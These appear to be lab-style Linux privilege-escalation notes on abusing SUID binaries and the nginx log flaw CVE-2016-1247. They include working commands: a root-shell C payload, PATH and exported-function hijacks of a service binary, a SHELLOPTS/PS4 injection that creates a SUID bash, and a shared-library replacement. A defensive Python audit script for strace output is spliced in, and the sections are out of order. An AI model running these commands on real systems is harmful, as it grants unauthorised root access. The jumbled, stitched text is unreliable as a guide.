SUID
find / -perm -u=s -type f 2>/dev/null
This lists every file with the SUID permission set.
You can see the SUID permission in the ls -l output as an s in the owner's execute position.
Here again we can use GTFOBins and check whether our binary is listed there with documented SUID exploitation.
You can see an example of this exploit in this writeup.
find / -type f -perm -04000 -ls 2>/dev/null
ls -al nameoffile
In our example the file is /usr/local/bin/suid-so
strace /usr/local/bin/suid-so 2>&1
or, with a grep on what could be interesting: strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
This shows us which files the binary tries to use. This is where we check whether we have write rights on one of those files (or on the directory in which a missing one would be created). In our example we will use this file from the output: open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Once we find a file we can try to overwrite it with a payload to elevate our privileges
We make a directory for our file
We compile our file: gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c
In my example the file I will overwrite is /home/user/.config/libcalc.so
This way we just need to run the SUID file, which is /usr/local/bin/suid-so in our example
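The strace step above can be made systematic. The following audit script is an added example, not code from the original page: it parses the strace output of a SUID binary and reports every file the binary probes outside the standard system locations, separating paths that do not exist yet (where a planted file would be loaded on the next run) from files already loaded from an unusual place. TRUSTED_PREFIXES and the sample strace lines are constructed assumptions.

```python
import re

# Matches e.g.  openat(AT_FDCWD, "/tmp/x.so", O_RDONLY) = -1 ENOENT (No such file or directory)
# and tolerates the "[pid N]" prefix that strace -f adds.
_CALL_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?(open|openat|access|execve)\('
    r'(?:AT_FDCWD,\s*)?"([^"]+)"[^=]*=\s*(-?\d+)(?:\s+(E[A-Z]+))?'
)

# Where a root-owned SUID binary may legitimately read code or config from.
# Assumed for this example; adjust to the host's ld.so.conf and package layout.
TRUSTED_PREFIXES = ("/lib/", "/lib64/", "/usr/", "/etc/", "/bin/", "/sbin/",
                    "/dev/", "/proc/", "/sys/")

def parse_strace_line(line):
    """Return (syscall, path, return_value, errno_name) or None for other lines."""
    m = _CALL_RE.match(line)
    if not m:
        return None
    syscall, path, ret, err = m.groups()
    return syscall, path, int(ret), err

def audit(lines, trusted=TRUSTED_PREFIXES):
    """Flag every file lookup outside the trusted prefixes.
    'missing': ENOENT, so a file planted there by anyone who can write the
    directory is picked up on the next run. 'present': loaded from an odd place.
    """
    findings = []
    for line in lines:
        parsed = parse_strace_line(line)
        if parsed is None:
            continue
        syscall, path, _ret, err = parsed
        if path.startswith(trusted):
            continue
        findings.append((syscall, path, "missing" if err == "ENOENT" else "present"))
    return findings

# Constructed sample modelled on the strace output shown on this page.
STRACE_SAMPLE = """\
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/tmp/plugins/helper.so", O_RDONLY) = 3
"""

if __name__ == "__main__":
    for syscall, path, status in audit(STRACE_SAMPLE.splitlines()):
        print(f"{status:8} {syscall:7} {path}")
```

Feed it real output with strace -f -o trace.log /path/to/binary and then audit(open("trace.log").read().splitlines()); any finding is a path the binary's owner should pin to a root-owned location.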
Issues with the log created by nginx
./linuxexploitsuggester.sh
We should get this output: [+] [CVE-2016-1247] nginxed-root.sh
Or we could look for this specific vulnerability manually by checking the nginx version: dpkg -l | grep nginx
Now we need to check if the SUID bit is set on sudo: find / -type f -perm -04000 -ls 2>/dev/null
or ls -al /usr/bin/sudo
ls -al /var/log/nginx
We will need to create a malicious symlink.
We will use this script to do so:
./nginxed-root.sh /var/log/nginx/error.log
Check out this resource to learn more about this way to escalate
Let's create a malicious service binary and add it to our PATH so that it is launched in place of the real service command that the SUID binary uses to start apache
printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
Instead of creating a malicious binary we create a malicious shell function whose name is the full path the SUID binary calls
export -f /usr/sbin/service
Then we export the function so that it is inherited by the shell the SUID binary spawns
/usr/local/bin/suid-env2
Finally we just need to launch the SUID binary, which calls the service command
OR
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
And it should give us a root prompt.
For the nginx case above: when nginx is restarted, we will be root.
find / -type f -perm -04000 -ls 2>/dev/null
We can then check for a SUID binary that relies on environment variables; in our example we have /usr/local/bin/suid-env
This launches apache through the service command without a full path (we know this by running strings on the file).
We now need to prepend /tmp to our PATH: export PATH=/tmp:$PATH
And now we just need to run the binary /usr/local/bin/suid-env to escalate to root
find / -type f -perm -04000 -ls 2>/dev/null
We can then check for a SUID binary that relies on environment variables; in our example we have /usr/local/bin/suid-env2
This launches apache using the full path of the service command, /usr/sbin/service (we know this by running strings on the file).